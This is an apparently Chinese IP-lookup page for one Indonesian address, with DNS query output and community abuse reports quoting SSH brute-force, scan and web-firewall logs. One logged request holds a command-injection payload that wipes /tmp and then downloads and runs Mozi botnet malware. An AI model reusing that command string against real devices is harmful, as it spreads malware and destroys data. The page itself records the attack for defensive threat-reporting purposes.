必须是合法有效的IP地址, 可以是IPv4或者是IPv6, 例如127.0.0.1或者2001:DB8:0:0:8:800:200C:417A
基本信息:

城市(city): unknown

省份(region): unknown

国家(country): Indonesia

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:
暂无关于此IP的讨论, 沙发请点上方按钮
相同子网IP讨论:
暂无关于此IP所属子网相关IP的讨论.
WHOIS信息:
b
DIG信息:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 149.108.192.113
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 21833
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;149.108.192.113.		IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025022801 1800 900 604800 86400

;; Query time: 15 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Mar 01 03:11:37 CST 2025
;; MSG SIZE  rcvd: 108
HOST信息:
Host 113.192.108.149.in-addr.arpa. not found: 3(NXDOMAIN)
NSLOOKUP信息:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 113.192.108.149.in-addr.arpa: NXDOMAIN
相关IP信息:
最新评论:
IP 类型 评论内容 时间
103.135.38.152 attack
Unauthorized connection attempt from IP address 103.135.38.152 on Port 445(SMB)
2020-07-07 20:42:37
35.224.204.56 attackspambots
(sshd) Failed SSH login from 35.224.204.56 (US/United States/56.204.224.35.bc.googleusercontent.com): 5 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_SSHD; Logs: Jul  7 13:49:32 amsweb01 sshd[21307]: Invalid user daniel from 35.224.204.56 port 51938
Jul  7 13:49:34 amsweb01 sshd[21307]: Failed password for invalid user daniel from 35.224.204.56 port 51938 ssh2
Jul  7 14:00:04 amsweb01 sshd[23538]: Invalid user dani from 35.224.204.56 port 37872
Jul  7 14:00:06 amsweb01 sshd[23538]: Failed password for invalid user dani from 35.224.204.56 port 37872 ssh2
Jul  7 14:03:03 amsweb01 sshd[24099]: Invalid user tmp from 35.224.204.56 port 34730
2020-07-07 20:18:11
45.254.34.157 attackspambots
2020-07-07 06:54:16.431036-0500  localhost smtpd[86405]: NOQUEUE: reject: RCPT from unknown[45.254.34.157]: 450 4.7.25 Client host rejected: cannot find your hostname, [45.254.34.157]; from= to= proto=ESMTP helo=<009be087.painbackme.xyz>
2020-07-07 20:11:25
123.28.121.154 attack
SCAN: Host Sweep CloudCIX Reconnaissance Scan Detected, PTR: localhost.
2020-07-07 20:34:10
106.54.9.63 attackspam
Jul  7 14:30:31 lnxded63 sshd[27103]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.54.9.63
Jul  7 14:30:31 lnxded63 sshd[27103]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.54.9.63
2020-07-07 20:32:37
129.146.110.88 attack
[TueJul0714:02:34.0733572020][:error][pid3015:tid47247920740096][client129.146.110.88:52096][client129.146.110.88]ModSecurity:Accessdeniedwithcode403\(phase2\).Patternmatch"python-requests/"atREQUEST_HEADERS:User-Agent.[file"/etc/apache2/conf.d/modsec_rules/20_asl_useragents.conf"][line"218"][id"332039"][rev"4"][msg"Atomicorp.comWAFRules:SuspiciousUnusualUserAgent\(python-requests\).Disablethisruleifyouusepython-requests/."][severity"CRITICAL"][hostname"mail.agilityrossoblu.ch"][uri"/"][unique_id"XwRkWpoMeYGAtFjxm8GOZgAAAJU"][TueJul0714:02:35.4041202020][:error][pid2541:tid47247891322624][client129.146.110.88:52506][client129.146.110.88]ModSecurity:Accessdeniedwithcode403\(phase2\).Patternmatch"python-requests/"atREQUEST_HEADERS:User-Agent.[file"/etc/apache2/conf.d/modsec_rules/20_asl_useragents.conf"][line"218"][id"332039"][rev"4"][msg"Atomicorp.comWAFRules:SuspiciousUnusualUserAgent\(python-requests\).Disablethisruleifyouusepython-requests/."][severity"CRITICAL"][hostname"
2020-07-07 20:42:50
222.186.175.23 attackspambots
2020-07-07T14:11:23.815380vps773228.ovh.net sshd[14660]: Failed password for root from 222.186.175.23 port 52139 ssh2
2020-07-07T14:11:25.646682vps773228.ovh.net sshd[14660]: Failed password for root from 222.186.175.23 port 52139 ssh2
2020-07-07T14:11:29.244335vps773228.ovh.net sshd[14660]: Failed password for root from 222.186.175.23 port 52139 ssh2
2020-07-07T14:11:33.422611vps773228.ovh.net sshd[14664]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.175.23  user=root
2020-07-07T14:11:35.265638vps773228.ovh.net sshd[14664]: Failed password for root from 222.186.175.23 port 10412 ssh2
...
2020-07-07 20:14:37
49.232.162.235 attackbotsspam
Failed password for invalid user jaka from 49.232.162.235 port 52038 ssh2
2020-07-07 20:21:57
118.25.111.130 attackspam
Jul  7 13:59:32 buvik sshd[13447]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.25.111.130
Jul  7 13:59:34 buvik sshd[13447]: Failed password for invalid user ts3server from 118.25.111.130 port 49950 ssh2
Jul  7 14:03:04 buvik sshd[14356]: Invalid user webmaster from 118.25.111.130
...
2020-07-07 20:17:49
218.92.0.148 attackspam
Jul  7 14:17:30 piServer sshd[2543]: Failed password for root from 218.92.0.148 port 60011 ssh2
Jul  7 14:17:34 piServer sshd[2543]: Failed password for root from 218.92.0.148 port 60011 ssh2
Jul  7 14:17:37 piServer sshd[2543]: Failed password for root from 218.92.0.148 port 60011 ssh2
...
2020-07-07 20:20:23
123.122.160.119 attack
Jul  7 15:16:54 journals sshd\[78974\]: Invalid user william from 123.122.160.119
Jul  7 15:16:54 journals sshd\[78974\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=123.122.160.119
Jul  7 15:16:56 journals sshd\[78974\]: Failed password for invalid user william from 123.122.160.119 port 53061 ssh2
Jul  7 15:23:48 journals sshd\[79644\]: Invalid user web from 123.122.160.119
Jul  7 15:23:48 journals sshd\[79644\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=123.122.160.119
...
2020-07-07 20:26:15
120.71.146.45 attackbots
 TCP (SYN) 120.71.146.45:59752 -> port 22647, len 44
2020-07-07 20:03:24
36.76.211.145 attack
SCAN: Host Sweep CloudCIX Reconnaissance Scan Detected, PTR: PTR record not found
2020-07-07 20:22:27
142.162.234.170 attackspam
142.162.234.170 - - [07/Jul/2020:14:58:47 +0300] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 196 "-" "Hello, world"
2020-07-07 20:30:50
125.162.22.15 attackbotsspam
SCAN: Host Sweep CloudCIX Reconnaissance Scan Detected, PTR: 15.subnet125-162-22.speedy.telkom.net.id.
2020-07-07 20:13:38

最近上报的IP列表

17.90.11.240 177.230.86.19 180.99.178.96 230.155.115.72
193.158.0.113 132.72.87.83 247.249.167.157 72.136.34.105
63.137.52.225 103.250.38.172 146.104.31.121 40.34.232.180
253.190.49.105 134.1.40.216 76.44.146.116 59.100.99.48
244.194.31.21 235.141.190.45 54.146.130.152 152.163.253.246